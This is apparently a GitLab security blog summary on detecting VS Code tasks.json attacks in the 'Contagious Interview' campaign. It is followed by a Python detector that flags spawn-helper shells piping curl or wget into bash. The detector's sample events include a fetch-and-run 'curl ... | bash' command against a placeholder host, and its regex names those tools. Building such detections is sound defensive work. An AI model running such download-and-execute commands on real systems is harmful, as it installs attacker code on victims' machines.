GitLab

How to detect and prevent Contagious Interview IDE attacks

GitLab's Security Operations team, including Threat Intelligence and SIRT, collaborates closely to combat evolving threats. They recently published an article detailing North Korean tradecraft, specifically the malicious use of VS Code tasks.

The Contagious Interview campaign uses fake interview processes to trick candidates into running malicious code through IDE tasks. Attackers place a tasks.json file in a compromised repository so that its commands execute as soon as the repository is opened in VS Code, letting them install malware, steal credentials, and establish persistence on the victim's system.

GitLab developed preventative measures by analyzing node-pty's spawn() function, which VS Code and other IDEs use to launch processes. They built detections around spawn-helper, the helper invoked for background tasks, to identify suspicious activity. Focusing on non-interactive processes, such as the curl | bash command execution these tasks commonly rely on, keeps false positives low. GitLab also recommends disabling task runs globally or educating users about the risks.

This comprehensive approach helps protect GitLab and its customers from IDE-based attacks, and GitLab hopes it inspires others to combat Advanced Persistent Threats.
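The detection idea above, as an added example that is not GitLab's own code: a process-start record is flagged only when its parent image is spawn-helper, the child is a shell started non-interactively (via -c rather than -i), and the script pipes a download into a shell. The record shape, field names and sample events are constructed assumptions, not telemetry from the article.

```python
"""Flag download-and-execute commands run by non-interactive shells spawned through spawn-helper."""
import re
import shlex

SHELLS = {"sh", "bash", "zsh", "dash"}
# A download tool whose output is piped straight into a shell, e.g. `curl ... | bash`.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh|dash)\b")
# Short-option cluster containing `i`, e.g. `-i` or `-il`: an interactive shell.
INTERACTIVE_OPT = re.compile(r"-[a-zA-Z]*i[a-zA-Z]*")

# Constructed process-start telemetry (an assumption about the record shape, not the article's data).
EVENTS = [
    {"pid": 4101, "parent_image": "spawn-helper", "image": "zsh",
     "cmdline": "/bin/zsh -il"},                                   # integrated terminal: interactive
    {"pid": 4102, "parent_image": "spawn-helper", "image": "bash",
     "cmdline": "/bin/bash -c 'npm run build'"},                   # ordinary task: no download pipe
    {"pid": 4103, "parent_image": "spawn-helper", "image": "bash",
     "cmdline": "/bin/bash -c 'curl -fsSL https://example.invalid/s.sh | bash'"},  # should be flagged
    {"pid": 4104, "parent_image": "bash", "image": "bash",
     "cmdline": "/bin/bash -c 'curl -fsSL https://example.invalid/s.sh | bash'"},  # not via spawn-helper
]


def task_script(cmdline):
    """Return the script a shell was given with -c, or None if the command is not a non-interactive shell."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] not in SHELLS:
        return None
    if any(INTERACTIVE_OPT.fullmatch(a) for a in argv[1:]):
        return None
    for i, arg in enumerate(argv[1:], start=1):
        if arg == "-c" and i + 1 < len(argv):
            return argv[i + 1]
    return None


def flag_spawn_helper_downloads(events):
    """Return the pids of spawn-helper children whose task script pipes a download into a shell."""
    hits = []
    for ev in events:
        if ev["parent_image"] != "spawn-helper":
            continue
        script = task_script(ev["cmdline"])
        if script and PIPE_TO_SHELL.search(script):
            hits.append(ev["pid"])
    return hits


if __name__ == "__main__":
    print(flag_spawn_helper_downloads(EVENTS))  # [4103]
```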